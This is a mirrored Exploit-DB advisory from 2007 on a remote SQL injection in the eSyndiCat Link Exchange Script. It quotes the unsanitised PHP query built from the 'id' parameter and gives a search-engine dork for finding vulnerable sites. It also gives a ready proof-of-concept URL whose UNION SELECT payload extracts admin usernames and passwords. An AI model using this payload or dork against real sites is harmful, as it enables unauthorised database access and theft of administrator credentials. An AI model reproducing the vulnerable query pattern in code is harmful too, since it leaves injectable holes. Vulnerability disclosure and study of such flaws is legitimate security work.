bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/4791.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

33 lines
No EOL
1.1 KiB
Text
Raw Blame History

--------------------------------------------------------------
eSyndiCat Link Exchange Script - Remote SQL Injection Advisory
--------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://www.esyndicat.com/
dork.....: "© 2005-2006 Powered by eSyndiCat Link Exchange Script"
details..: works with magic_quotes_gpc = off
[-] Vulnerable code in /suggest-link.php :
30. /** gets information about current category **/
31. $category =& $gDirDb->getCategoryById($_GET['id']);
32. $gDirSmarty->assign_by_ref('category', $category);
[-] getCategoryById function defined in /classes/Dir.php :
323. function getCategoryById($aCategory)
325. {
326. $sql = "SELECT * FROM `{$this->mPrefix}categories` ";
327. $sql .= "WHERE `id` = '{$aCategory}'";
328.
329. return $this->mDb->getRow($sql);
330. }
[*] An attacker can break database through browser! P.o.C. :
http://[host]/[path]/suggest-link.php?id=-1'/**/UNION/**/SELECT/**/1,1,1,password,1,1,1,1,username,1,1/**/FROM/**/dir_admins/*
# milw0rm.com [2007-12-25]
Reference in a new issue View git blame Copy permalink